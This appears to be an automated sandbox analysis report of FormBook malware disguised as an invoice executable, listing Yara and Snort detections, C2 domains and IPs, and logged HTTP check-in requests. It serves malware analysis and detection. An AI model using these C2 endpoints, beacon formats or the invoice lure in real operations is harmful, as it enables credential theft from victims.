Source: Yara match	File source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Joe Sandbox ML: detected

Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.raserver.exe.51c7960.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.raserver.exe.30cde50.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.695638149.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000000.00000003.650872254.0000000009990000.00000004.00000001.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704631628.0000000000BDF000.00000040.00000001.sdmp, raserver.exe, 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704478667.0000000000940000.00000040.00000001.sdmp
Source:	Binary string: RAServer.pdbGCTL source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704478667.0000000000940000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.695638149.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_00405E61 FindFirstFileA,FindClose,	0_2_00405E61
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_0040548B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 4x nop then pop esi	2_2_0041583E
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 4x nop then pop ebx	2_2_00406A96
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop esi	7_2_00AC583E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop ebx	7_2_00AB6A96

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49757 -> 121.254.178.252:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49757 -> 121.254.178.252:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49757 -> 121.254.178.252:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 85.159.66.93:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 85.159.66.93:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 85.159.66.93:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 35.205.61.67:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 35.205.61.67:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 35.205.61.67:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 37.48.65.148:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 37.48.65.148:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 37.48.65.148:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.rebeccannemontgomery.net/dp3a/

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.hireinone.xyz

Source: global traffic	HTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1Host: www.theyogirunner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1Host: www.theyogirunner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.kladios.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.hireinone.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=gKBh5mJw+OBG/cLQbNfpnnQYqc+45jCeSmhHkERkUIltQJh3+jBq8zykiXiJ5ld+SMHF&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.closetofaurora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H HTTP/1.1Host: www.28ji.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.kingguardgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.rebeccannemontgomery.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ HTTP/1.1Host: www.pecon.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 23.227.38.74 23.227.38.74

Source: Joe Sandbox View	ASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
Source: Joe Sandbox View	ASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1Host: www.theyogirunner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1Host: www.theyogirunner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.kladios.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.hireinone.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=gKBh5mJw+OBG/cLQbNfpnnQYqc+45jCeSmhHkERkUIltQJh3+jBq8zykiXiJ5ld+SMHF&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.closetofaurora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H HTTP/1.1Host: www.28ji.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.kingguardgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.rebeccannemontgomery.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ HTTP/1.1Host: www.pecon.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.theyogirunner.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Jun 2021 12:36:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 70 33 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dp3a/ was not found on this server.</p></body></html>

Source: raserver.exe, 00000007.00000002.915003619.0000000005342000.00000004.00000001.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.659286527.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405042

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_004181C0 NtCreateFile,	2_2_004181C0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00418270 NtReadFile,	2_2_00418270
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_004182F0 NtClose,	2_2_004182F0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_004183A0 NtAllocateVirtualMemory,	2_2_004183A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_004181BC NtCreateFile,	2_2_004181BC
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_004182EB NtClose,	2_2_004182EB
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041839B NtAllocateVirtualMemory,	2_2_0041839B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B298F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_00B298F0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_00B29860
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29840 NtDelayExecution,LdrInitializeThunk,	2_2_00B29840
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B299A0 NtCreateSection,LdrInitializeThunk,	2_2_00B299A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_00B29910
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29A20 NtResumeThread,LdrInitializeThunk,	2_2_00B29A20
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_00B29A00
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29A50 NtCreateFile,LdrInitializeThunk,	2_2_00B29A50
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B295D0 NtClose,LdrInitializeThunk,	2_2_00B295D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29540 NtReadFile,LdrInitializeThunk,	2_2_00B29540
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B296E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_00B296E0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_00B29660
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B297A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_00B297A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29780 NtMapViewOfSection,LdrInitializeThunk,	2_2_00B29780
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29FE0 NtCreateMutant,LdrInitializeThunk,	2_2_00B29FE0
